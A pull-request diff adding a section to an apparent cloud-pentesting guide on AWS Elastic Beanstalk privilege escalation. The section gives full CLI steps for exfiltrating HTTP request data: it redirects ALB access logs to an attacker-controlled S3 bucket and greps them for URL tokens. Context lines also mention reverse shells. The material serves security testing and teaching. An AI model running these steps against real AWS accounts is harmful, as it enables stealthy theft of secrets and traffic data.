Merge pull request #287 from JaimePolop/master

a

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc/README.md

@@ -182,7 +182,97 @@ Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBe
 The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.
 ```
 
+### `elasticbeanstalk:DescribeEnvironmentResources`, `elasticloadbalancing:ModifyLoadBalancerAttributes`, `s3:PutBucketPolicy`, `s3:ListBucket`, `s3:GetObject` to enable ALB access logs exfiltration
+
+If an attacker can **enumerate** an Elastic Beanstalk **web** environment, **update** it, and also **control the policy of an S3 bucket** they own, they may be able to **exfiltrate HTTP traffic** by enabling **ALB access logs** and redirecting them to that bucket.
+
+> [!NOTE]
+> This technique also needs the ability to **modify the destination bucket policy** so the ALB log delivery service can write the logs there.
+
+Prepare an **attacker-controlled bucket** so the ALB log delivery service can write there:
+
+```bash
+ENV_NAME=<environment-name>
+LOG_BUCKET=<attacker-bucket>
+LOG_PREFIX=<prefix>
+cat > /tmp/alb-log-policy.json <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "AllowALBLogDeliveryPut",
+      "Effect": "Allow",
+      "Principal": {
+        "Service": [
+          "logdelivery.elasticloadbalancing.amazonaws.com",
+          "delivery.logs.amazonaws.com"
+        ]
+      },
+      "Action": "s3:PutObject",
+      "Resource": "arn:aws:s3:::$LOG_BUCKET/$LOG_PREFIX/AWSLogs/$ACCOUNT_ID/*"
+    },
+    {
+      "Sid": "AllowALBLogDeliveryAclCheck",
+      "Effect": "Allow",
+      "Principal": {
+        "Service": [
+          "logdelivery.elasticloadbalancing.amazonaws.com",
+          "delivery.logs.amazonaws.com"
+        ]
+      },
+      "Action": [
+        "s3:GetBucketAcl",
+        "s3:ListBucket"
+      ],
+      "Resource": "arn:aws:s3:::$LOG_BUCKET"
+    }
+  ]
+}
+EOF
+
+aws s3api put-bucket-policy \
+  --bucket "$LOG_BUCKET" \
+  --policy file:///tmp/alb-log-policy.json \
+  --profile "$PROFILE"
+```
+
+Then enable the ALB access logs:
+
+```bash
+aws elbv2 modify-load-balancer-attributes \
+  --load-balancer-arn "$LB_ARN" \
+  --attributes \
+    Key=access_logs.s3.enabled,Value=true \
+    Key=access_logs.s3.bucket,Value=$LOG_BUCKET \
+    Key=access_logs.s3.prefix,Value=$LOG_PREFIX \
+  --region us-east-1 \
+  --profile "$PROFILE"
+```
+
+After that, wait for the ALB to batch and deliver the logs:
+
+```bash
+aws s3 ls "s3://$LOG_BUCKET/$LOG_PREFIX/AWSLogs/$ACCOUNT_ID/" --recursive --profile "$PROFILE"
+```
+
+Finally, download the logs and grep for interesting query strings:
+
+```bash
+mkdir -p /tmp/lab2-logs
+aws s3 cp "s3://$LOG_BUCKET/$LOG_PREFIX/AWSLogs/$ACCOUNT_ID/" \
+  /tmp/lab2-logs \
+  --recursive \
+  --profile "$PROFILE"
+
+find /tmp/lab2-logs -name '*.gz' -print0 | xargs -0 zgrep -n 'token='
+```
+
+The **request line** inside the ALB logs may contain values such as **`?token=<FLAG>`** if sensitive data is being sent in the URL.
+
+**Impact**:
+
+- Continuous exfiltration of HTTP request metadata through a logging plane controlled by the attacker
+- Exposure of secrets present in the URL query string
+- A stealthier exfiltration path because the traffic is produced by legitimate application components and exported by AWS-managed logging
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-